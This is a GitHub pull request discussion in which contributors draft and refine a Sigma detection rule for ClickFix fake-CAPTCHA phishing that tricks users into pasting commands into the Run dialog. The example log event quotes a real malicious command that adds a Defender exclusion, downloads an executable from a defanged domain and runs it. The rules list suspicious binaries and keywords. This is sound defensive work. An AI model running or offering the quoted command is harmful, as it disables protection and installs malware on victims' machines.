Adding rule for detecting recaptcha phish process executions

[montysecurity]

Summary of the Pull Request

Adding rule for detecting recaptcha phish process executions

Changelog

New: proc_creation_win_powershell_fake_captcha.yml

Example Log Event

cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''

Reference: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware

Fixed Issues

N/A

SigmaHQ Rule Creation Conventions

• If your PR adds new rules, please consider following and applying these conventions

[github-actions]

Welcome @montysecurity 👋

It looks like this is your first pull request on the Sigma rules repository!

Please make sure to read the SigmaHQ conventions document to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.

Thanks again, and welcome to the Sigma community! 😃

[swachchhanda000]

Hi
I have observed others patterns among malware abusing this clickfix technique and adjusted @montysecurity 's rules accordingly. His rule was slightly incorrect as well because for log event given in his example, the image will be cmd.exe for parentimage explorer.exe not powershell.exe.

Thats why i added them on commandline not on image just to be safe

proc_creation_win_susp_clickfix_execution_pattern.yml

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com./JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'I am not a robot - reCAPTCHA Verification'
            - 'Verify you are human - Ray Verification ID:'
    selection_cmd_2:
        CommandLine|contains:
          - 'mshta'
          - 'powershell'
          # Add more potentially suspicious executables used for malware download/execution
    condition: all of selection_*
falsepositives:
    - Higly unlikely
level: high

cc @nasbench , @frack113

[montysecurity]

Good eye and thanks for the assist @swachchhanda000 !

[nasbench]

Hi I have observed others patterns among malware abusing this clickfix technique and adjusted @montysecurity 's rules accordingly. His rule was slightly incorrect as well because for log event given in his example, the image will be cmd.exe for parentimage explorer.exe not powershell.exe.

Thats why i added them on commandline not on image just to be safe

proc_creation_win_susp_clickfix_execution_pattern.yml

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com./JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'I am not a robot - reCAPTCHA Verification'
            - 'Verify you are human - Ray Verification ID:'
    selection_cmd_2:
        CommandLine|contains:
          - 'mshta'
          - 'powershell'
          # Add more potentially suspicious executables used for malware download/execution
    condition: all of selection_*
falsepositives:
    - Higly unlikely
level: high

cc @nasbench , @frack113

You do not need the CLI for the binaries as the captcha strings are enough.

[swachchhanda000]

@nasbench , @frack113
See this,
https://app.any.run/tasks/61fd06c8-2332-450d-b44b-091fe5094335/?utm_source=twitter&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice

https://x.com/anyrun_app/status/1897651321462784280
I guess, We also need to add 'I'm human ID' in the commandline
or like try to think more genericly

[montysecurity]

@swachchhanda000 what about something like this? going for the more generic approach

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com./JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
    selection_cmd_1:
        CommandLine|contains:
            - 'robot'
            - 'captcha'
            - 'recaptcha'
            - 'human'
            - 'verify'
            - 'verification'
    selection_cmd_2:
        CommandLine|contains:
            - '#' # PowerShell Comment
    selection_cmd_3:
        CommandLine|contains:
            - 'mshta'
            - 'powershell'
            - 'certutil'
            - 'scrobj.dll'
            # Add more potentially suspicious executables used for malware download/execution
    selection_cmd_4:
        CommandLine|contains:
            - 'https://'
            - 'http://'
    condition: all of selection_*
falsepositives:
    - Higly unlikely
level: high

[swachchhanda000]

Hi, after a brief research, I discovered that there are other forms of fake CAPTCHA messages being used in these lures. The '#' symbol remains a consistent element across all of them. Therefore, I made some adjustments by removing the suspicious executables to ensure the rule is not overly specific.

title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
    Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
    This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
    These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
    The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
    This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
    - https://github.com./JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-22
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
        CommandLine|contains: '#'
    selection_cmd:
        CommandLine|contains:
            # Add more suspicious keyword
            - 'account'
            - 'anti-bot'
            - 'botcheck'
            - 'captcha'
            - 'challenge'
            - 'confirmation'
            - 'fraud'
            - 'human'
            - 'identity'
            - 'robot'
            - 'validation'
            - 'verification'
            - 'verify'
    condition: all of selection_*
falsepositives:
    - Highly unlikely
level: high

cc @montysecurity, @nasbench , @frack113

OR we can be little bit more generic by looking at Explorer.exe as ParentImage and commandline containing 'http', a medium level rule. Let me know what you think?

title: Suspicious User-Initiated URL Execution via Explorer
id: df66b1ea-4ffe-4089-92b4-44d163b40d27
status: experimental
description: |
    Detects instances where Explorer.exe spawns processes with command lines containing URLs.
    This could indicate a user being socially engineered to execute commands via clipboard manipulation, such as in ClickFix or similar malware delivery campaigns.
    It may also catch generic misuse where users are manually launching download cradles or scripts that reference external resources.
references:
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-22
tags:
    - attack.execution
    - attack.t1204.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\explorer.exe'
        CommandLine|contains: 'http'
    condition: selection
falsepositives:
    - IT administrators or power users launching trusted tools/scripts with URLs manually from explorer
    - In-house tools that might pass URLs as arguments via explorer-launched processes
level: medium

[montysecurity]

Thanks @swachchhanda000 ! Given the target of the hunt being recaptcha, I like the first one you list there (Potential ClickFix Execution Pattern) better.

The second one is a good hunt as well, and yet I think it expands the scope a bit too far outside of recaptcha/clickfix. It definitely has some value though, so maybe as a separate rule?

[frack113]

I prefer to stay with the pattern :

    selection_parent:
        ParentImage|endswith: '\explorer.exe'
        CommandLine|contains: '#'
    selection_cmd:
        CommandLine|contains:
        # Add more suspicious keyword

CommandLine|contains: 'http' may have too many false positif